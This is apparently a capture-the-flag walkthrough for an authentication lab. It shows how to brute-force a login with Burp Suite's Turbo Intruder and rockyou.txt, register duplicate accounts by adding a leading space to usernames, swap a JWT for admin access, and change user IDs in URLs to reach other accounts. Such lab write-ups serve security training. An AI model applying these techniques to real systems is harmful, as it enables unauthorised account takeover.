Authenticate

First you must launch your virtual machine.

Next, we need to go to the web page. so it's <machine IP> and then:8888. An example is 10.10.15.23:8888. You will see this web page is displayed.

As you can see the first flag is done for you by the creator of the room. The username is Jack and the password is 123456. Use those credentials to get the first flag.

Before you try to crack the password with Intruder, I want to show you another option within Burp Suite called Turbo Intruder. It is a lot faster than the one normally used. To find it, you need to go to the extender tab. Under this tab look for the BApp Store tab. Once you are under this tab you need to search for Intruder, this will reduce the number of apps to look through. You should see near the top the Turbo Intruder extensions. On the right-hand side of the screen, you will see a description of Turbo Intruder and an install button. Click on the install button.

Once it is installed you want to make sure to go over to the extensions tab to see thatTurbo Intruder is in fact loaded.

Now it time to put your Burp Suite skills to work. You need to find the password for a new user named mike. Before you try logging in with mike and a random password, fire up Burp Suite. Once you have Burp up and running it time to try to log into Mike's account so you can intercept the traffic with Burp.

Here you can see the traffic was intercepted by Burp and I tried logging in with Username: mike and Password: admin. It didn't work, so now it's time to send this information over to Turbo Intruder in Burpe Suite. Right-click on the screen and look for the option “send to turbo intruder”.

Here you can see the traffic was sent over to Turbo Intruder. You have to make two adjustments before you can get started. 1. You need to tell Turbo Intruder what we want the word list to populate. In this case, you are trying to brute force the password. So you need to change out the password you guessed with to “%s”. 2. You need to tell Turbo Intruder where the world list is located. Look in the script and you will see the line “for word in open” and then you will see a location in pink. You need to change this to reflect the location of your rockyou.txt file.

In this screenshot, you will notice the changes were made, and now it's time to click on the attack button at the bottom of the screen.

You will see another screen pop up and the turbo intruder will start going through the password and providing you feedback. You will see a password that returns a 302 status. If you click on this you will see traffic from this password attempt. Here you will see that the web address shows that the login was successful because it says logged. You can stop your attack and try this password.

** You may want to find a password list on Github for the top 1000 passwords. This will shorten your wait time, even with Turbo Intruder this is not a fast process.

Once you login as mike you will see the flag for question in task 2.

The next task is to see the vulnerabilities with reregistration. In the directions, you are instructed to register an

account for Darren. As you will soon discover, you can not register that account because it is already in use.

Now lets include a space before darren ‘ darren’ and lets try to register that user.

Now that you have registered darren with a single space, it's time to log in and get the flag. you will use the password you created to login. You should be able to see the flag for the darren with no space account. Here you will see the flag for this question.

Let's try the same thing for the Arthur account as instructed.

Once you have registered Arthur's new account try to log in with the password you created and make sure to add

a space before arthur. log in and you should see the flag for this question.

For the next task, we need to use port 5000. Here is what you should see for the new webpage.

Now you will enter the user name and password. However, before you authenticate you need to fire up Burp Suite and have it ready to intercept the traffic.

In Burp Suite you will see the captured traffic. As you can see there is a JWT issued for this session.

After you click Authenticate and then go you will see a message like the one below. We need to change up the session token so we can get admin access.

In order to change the token, you need to right-click on the web page and choose "inspect element". This for those of you that are using Firefox.

Now you move on over to the Storage tab and on the left-hand side, you should see Local storage. This is where you will find the JWT that you need to change.

You need to change it out with the new JWT token from the instructions.

All you need to do is double-click on the token and it will allow you to paste in the new JWT you got from the task. As you can see the JWT matches the screenshot from above.

Now you need to hit go and you will see that you now have admin access and will see a new message appear.

For the next task you need to change over to port 7777. you should see this page.

As instructed you need to create a user.

You will see that you have successfully created your account.

Go and visit your "private space" and pay attention to the user 1 in the web address.

As instructed change the 1 to a 2 and see what happens; you should see this screen below.

Now we need to find the super admin for this account. I tried user 0 for UID 0, Root-level access and it worked. you can see the password and the last flag.